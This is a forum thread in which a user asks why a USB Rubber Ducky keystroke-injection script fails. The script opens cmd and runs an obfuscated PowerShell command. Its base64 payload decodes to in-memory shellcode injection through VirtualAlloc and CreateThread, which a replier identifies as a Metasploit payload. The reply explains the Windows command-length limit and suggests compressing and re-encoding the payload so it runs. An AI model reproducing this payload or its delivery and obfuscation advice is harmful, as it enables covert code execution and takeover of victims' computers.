Jump to content

Not executing powershell code


Diablo108

Recommended Posts

Hi guys,

i'm trying to put some powershell onto the rubber ducky, but whenever i past the powershell code on the ducky.

it refuses to run it.

i've tested the code whitout the powershell part, and it ran (cause it's not such a difficult code) but after pasting the powershell text.

it just blinks onces red, while inserting the ducky in the pc and then nothing happens.

the code looks like this:

DELAY 750
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 500
STRING powershell -w 1 -C "s''v nq -;s''v bCi e''c;s''v tU ((g''v nq).value.toString()+(g''v bCi).value.toString());powershell (g''v tU).value.toString() ('JABIAGEAIAA9ACAAJwAkAEUAbAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAFQAawAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEUAbAAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABvAGIAIAA9ACAAMAB4AGIAYgAsADAAeABiADAALAAwAHgAZABmACwAMAB4ADcAOQAsADAAeABhADUALAAwAHgAZAA5ACwAMAB4AGMANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBmACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAYQAsADAAeAAzADEALAAwAHgANQBmACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwA3ACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQBmACwAMAB4AGQAMQAsADAAeAA5AGIALAAwAHgANQAwACwAMAB4AGYAMwAsADAAeAAwADYALAAwAHgAZAA5ACwAMAB4ADkAYgAsADAAeAAwAGIALAAwAHgAZAA3ACwAMAB4AGIAZQAsADAAeAAxADIALAAwAHgAZQBlACwAMAB4AGUANgAsADAAeABmAGUALAAwAHgANAAxACwAMAB4ADcAYgAsADAAeAA1ADgALAAwAHgAYwBmACwAMAB4ADAAMgAsADAAeAAyADkALAAwAHgANQA1ACwAMAB4AGEANAAsADAAeAA0ADcALAAwAHgAZAA5ACwAMAB4AGUAZQAsADAAeABjADgALAAwAHgANABmACwAMAB4AGUAZQAsADAAeAA0ADcALAAwAHgANgA2ACwAMAB4AGIANgAsADAAeABjADEALAAwAHgANQA4ACwAMAB4AGQAYgAsADAAeAA4AGEALAAwAHgANAAwACwAMAB4AGQAYgAsADAAeAAyADYALAAwAHgAZABmACwAMAB4AGEAMgAsADAAeABlADIALAAwAHgAZQA4ACwAMAB4ADEAMgAsADAAeABhADMALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeABkAGUALAAwAHgAZgAxACwAMAB4AGYAYwAsADAAeAA1ADIALAAwAHgANABkACwAMAB4AGUANQAsADAAeAA4ADkALAAwAHgAMgBmACwAMAB4ADQAZQAsADAAeAA4AGUALAAwAHgAYwAyACwAMAB4AGIAZQAsADAAeABkADYALAAwAHgANwAzACwAMAB4ADkAMgAsADAAeABjADEALAAwAHgAZgA3ACwAMAB4ADIAMgAsADAAeABhADgALAAwAHgAOQBiACwAMAB4AGQANwAsADAAeABjADUALAAwAHgANwBkACwAMAB4ADkAMAAsADAAeAA1ADEALAAwAHgAZABkACwAMAB4ADYAMgAsADAAeAA5AGQALAAwAHgAMgA4ACwAMAB4ADUANgAsADAAeAA1ADAALAAwAHgANgA5ACwAMAB4AGEAYgAsADAAeABiAGUALAAwAHgAYQA4ACwAMAB4ADkAMgAsADAAeAAwADAALAAwAHgAZgBmACwAMAB4ADAANAAsADAAeAA2ADEALAAwAHgANQA4ACwAMAB4ADMAOAAsADAAeABhADIALAAwAHgAOQBhACwAMAB4ADIAZgAsADAAeAAzADAALAAwAHgAZAAwACwAMAB4ADIANwAsADAAeAAyADgALAAwAHgAOAA3ACwAMAB4AGEAYQAsADAAeABmADMALAAwAHgAYgBkACwAMAB4ADEAMwAsADAAeAAwAGMALAAwAHgANwA3ACwAMAB4ADYANQAsADAAeABmAGYALAAwAHgAYQBjACwAMAB4ADUANAAsADAAeABmADAALAAwAHgANwA0ACwAMAB4AGEAMgAsADAAeAAxADEALAAwAHgANwA2ACwAMAB4AGQAMgAsADAAeABhADcALAAwAHgAYQA0ACwAMAB4ADUAYgAsADAAeAA2ADkALAAwAHgAZAAzACwAMAB4ADIAZAAsADAAeAA1AGEALAAwAHgAYgBkACwAMAB4ADUANQAsADAAeAA3ADUALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeAAzAGQALAAwAHgAMgBkACwAMAB4AGUAMAAsADAAeAAzADgALAAwAHgAOQBiACwAMAB4ADgAMAAsADAAeAAxAGQALAAwAHgANQBhACwAMAB4ADQANAAsADAAeAA3AGMALAAwAHgAYgA4ACwAMAB4ADEAMQAsADAAeAA2ADkALAAwAHgANgA5ACwAMAB4AGIAMQAsADAAeAA3ADgALAAwAHgAZQA2ACwAMAB4ADAAMwAsADAAeABhAGYALAAwAHgAZgA2ACwAMAB4AGYANgAsADAAeABiADMALAAwAHgANQA4ACwAMAB4ADkAZgAsADAAeAA5ADgALAAwAHgAMgBhACwAMAB4AGYAMwAsADAAeAAzADcALAAwAHgAMgA5ACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAYwAwACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAMQAzACwAMAB4ADEANQAsADAAeABlADMALAAwAHgAYQA5ACwAMAB4ADAAMAAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4ADIANgAsADAAeAA5AGQALAAwAHgAYQBhACwAMAB4ADIAZQAsADAAeAAxADEALAAwAHgAMQBlACwAMAB4ADgANwAsADAAeAA4ADIALAAwAHgAMABlACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgANwA2ACwAMAB4AGUAMgAsADAAeAAyADMALAAwAHgAOQAxACwAMAB4ADcAOQAsADAAeAAwADQALAAwAHgA'+'YgA0ACwAMAB4ADAAZAAsADAAeABlADEALAAwAHgAMAA0ACwAMAB4AGIANAAsADAAeABjAGQALAAwAHgAMwBkACwAMAB4ADMAMwAsADAAeABmAGQALAAwAHgAOQA0ACwAMAB4ADAAMgAsADAAeAA3AGEALAAwAHgAZgBkACwAMAB4ADcANgAsADAAeABlAGQALAAwAHgAMgBiACwAMAB4ADcANAAsADAAeABlADkALAAwAHgAMgBiACwAMAB4ADIAYwAsADAAeAA1ADMALAAwAHgAOQBjACwAMAB4ADcAMgAsADAAeAA4ADAALAAwAHgAMwA0ACwAMAB4ADkAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQAMQAsADAAeABjAGQALAAwAHgAZgBmACwAMAB4ADUANAAsADAAeAAxAGQALAAwAHgAYQAyACwAMAB4AGEAOQAsADAAeAAzADIALAAwAHgANABhACwAMAB4ADEAMQAsADAAeAA3ADgALAAwAHgAZgA4ACwAMAB4ADcAMwAsADAAeAA0AGMALAAwAHgAMQAyACwAMAB4ADkANAAsADAAeAA4ADEALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAA4ADMALAAwAHgANgAwACwAMAB4ADIAOQAsADAAeABhADcALAAwAHgAOAA3ACwAMAB4ADIAMgAsADAAeABjADAALAAwAHgAMgA4ACwAMAB4AGQAZQAsADAAeABhAGEALAAwAHgANgAxACwAMAB4ADEAMAAsADAAeAA0ADAALAAwAHgAYQBjACwAMAB4ADcANQAsADAAeAA0ADkALAAwAHgAMgBmACwAMAB4AGUAMgAsADAAeABkAGEALAAwAHgAMgAyACwAMAB4ADgANgAsADAAeAA2AGMALAAwAHgAZgAwACwAMAB4AGMAMgAsADAAeAAzAGUALAAwAHgAMQA2ACwAMAB4AGYANQAsADAAeAAxAGYALAAwAHgAYgBiACwAMAB4ADIAOAAsADAAeAA3AGMALAAwAHgAOAA5ACwAMAB4AGEAYwAsADAAeAAyADAALAAwAHgANgBjACwAMAB4AGIANQAsADAAeAAyAGMALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA0ADUALAAwAHgAMQA5ACwAMAB4ADcAOQAsADAAeAAyADgALAAwAHgANwAwACwAMAB4ADIAZAAsADAAeAAwAGMALAAwAHgAMQBhACwAMAB4ADEAMgAsADAAeAA0ADIALAAwAHgANQBiACwAMAB4ADAANgAsADAAeABiADQALAAwAHgANQBkACwAMAB4ADcAMQAsADAAeAAyAGQALAAwAHgANwA4ACwAMAB4AGMAYQAsADAAeAA3AGEALAAwAHgAYQAyACwAMAB4ADcAOAAsADAAeAAwAGEALAAwAHgAMQAzACwAMAB4AGMAMgAsADAAeAA3ADgALAAwAHgANABhACwAMAB4AGUAMwAsADAAeAA5ADEALAAwAHgAMQAwACwAMAB4ADEAMgAsADAAeAA0ADcALAAwAHgANAA2ACwAMAB4ADAANQAsADAAeAA1AGQALAAwAHgANQAyACwAMAB4AGYAYQAsADAAeAA5ADYALAAwAHgAZgAxACwAMAB4AGQANAAsADAAeAAxAGEALAAwAHgANABmACwAMAB4ADkAZQAsADAAeABlADYALAAwAHgAYwA0ACwAMAB4ADYAZgAsADAAeAA1AGUALAAwAHgAYgA0ACwAMAB4ADUAMgAsADAAeAAwADcALAAwAHgANABjACwAMAB4AGEAYwAsADAAeABkADIALAAwAHgAMwA1ACwAMAB4ADgAZgAsADAAeAAwADUALAAwAHgANgAxACwAMAB4ADcAOQAsADAAeAAwADQALAAwAHgANgBiACwAMAB4AGUAMQAsADAAeAA3AGUALAAwAHgAZQA0ACwAMAB4AGIAMAAsADAAeAA3ADMALAAwAHgANAAwACwAMAB4ADkAMwAsADAAeABkADMALAAwAHgAMgA0ACwAMAB4ADgAMwAsADAAeAAwADMALAAwAHgAZgA0ACwAMAB4AGIAYwAsADAAeABmAGMALAAwAHgANAAzACwAMAB4AGYAYgAsADAAeAAwAGUALAAwAHgAMwAyACwAMAB4ADkAMgAsADAAeAAzADUALAAwAHgANAAxACwAMAB4ADEAYwAsADAAeABkAGIALAAwAHgAMAA1ACwAMAB4ADkAMQAsADAAeAA0AGUALAAwAHgAMgAyACwAMAB4ADUAZgAsADAAeABkADEAOwAkAEoAdAAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABvAGIALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQASgB0ACAAPQAgACQAbwBiAC4ATABlAG4AZwB0AGgAfQA7ACQAcQBuAD0AJABUAGsAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABKAHQALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABPAFcAPQAwADsAJABPAFcAIAAtAGwAZQAgACgAJABvAGIALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQATwBXACsAKwApACAAewAkAFQAawA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAbgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABPAFcAKQAsACAAJABvAGIAWwAkAE8AVwBdACwAIAAxACkAfQA7ACQAVABrADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAG4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAHkAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABIAGEAKQApADsAJABvAFkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYwBiACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAGMAYgAgACQAbwBZACAAJAB5AFIAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbwBZACAAJAB5AFIAIgA7AH0A')"
ENTER

i tested it with after the 2nd STRING only the text ipconfig, to see if it works. 

and it ran, 

so why doesn't it run at all after pasting powershell text??

 

Link to comment
Share on other sites

Obfuscated Powershell I see.  There is a way to obfuscate more but I digress.  Issue you are having issues is because your are dancing around the max run line length.  Windows run line has a max length for commands, around 8k characters.  I don't have the exact number on me but I use 8000 as a rough estimate since it is so close to it.  Anything after that magic number is truncated so your command will be broken.

I looked through your encoded powershell.  You might can get away with compressing the payload, encode and then wrap the code to decompress and run around the encoded code and encode that to use.  You will have to do a size comparison afterwards to see if it made a difference.  Looks like a generic metasploit payload when decoded but doesn't do much for obfuscating the actual payload, you might even be able to get away with removing all that obfuscation.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...